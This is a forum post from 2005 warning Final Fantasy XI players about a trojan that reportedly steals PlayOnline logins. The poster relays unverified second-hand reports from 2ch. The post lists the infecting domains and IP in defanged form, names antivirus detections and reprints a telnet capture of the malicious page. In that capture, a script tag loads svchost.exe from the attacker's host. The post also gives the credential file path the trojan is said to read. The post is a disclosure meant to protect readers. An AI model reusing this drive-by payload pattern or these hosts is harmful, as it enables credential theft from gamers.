Please note that I can't read japanese myself and the info are passed to be from a friend living in Japan. He said this is a big news in 2ch forums right now and 50 accounts have been confirmed to be stolen as of October 22nd. Since I can not read japanese nor a computer expert, I can not confirm these information. So I want to pass these informations collected by my friend for everyone to see. Please use your own judgement whether to believe it or not.
here are the related threads from 2ch.
http://live19.2ch.net/test/read.cgi/ogame/1129895797/
http://archives.mmorpgplayer.com/nmz/data/live19.2ch.net/ogame/dat/1129895797.html
http://live19.2ch.net/test/read.cgi/ogame/1130087252/
http://news19.2ch.net/test/read.cgi/news/1130073619/
This trojan/spyware will run itself upon entering a certain websites which I listed below. This spyware will call for an HTML help file "icyfox.chm" and download svhost.exe running on top of windows' process of the same name.
This spyware is NOT detectable by
Norton AntiVirus 2005
Norton Internet Security 2005
Virus Bluster
The following are confirmed to be able to detect it.
AntiVir Win32:Mhtplo-31 > http://ringonoki.net/tool/antiv/antivir.html
Avast! TR/Copiet.B.1 > http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
these are some sites that are found to be spreading this trojan DO NOT TRY TO ENTER THEM I replace all dots with slashes
www-japan213-com = www-1102213-com = 211-100-26-182 It is a Chinese IP
www-1102213-com/ff11help/money.htm
www-1102213-com/ff11help/svchost.exe
www-japan213-com/ff11929/ff11.asp
telnet www-1102213-com 80
Trying 211-100-26-182...
Connected to www-1102213-com.
Escape character is '^]'.
GET HTTP://www-1102213-com/ff11help/money.htm/ HTTP/1.0
HTTP/1.1 200 OK
...
<HTML><HEAD><TITLE>INDEX</TITLE></HEAD><BODY>
<SCRIPT LANGUAGE="Script" src="http://www-1102213-com/ff11help/svchost.exe"></SCRIPT>
<SCRIPT language=JavaScript>function sopen()...
They believe it will read POL login information from C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
and store them into C:\gameff11.txt
Edited, Mon Oct 24 07:11:01 2005 by Jazalas
Edited, Thu Nov 10 10:29:58 2005 by Darkflame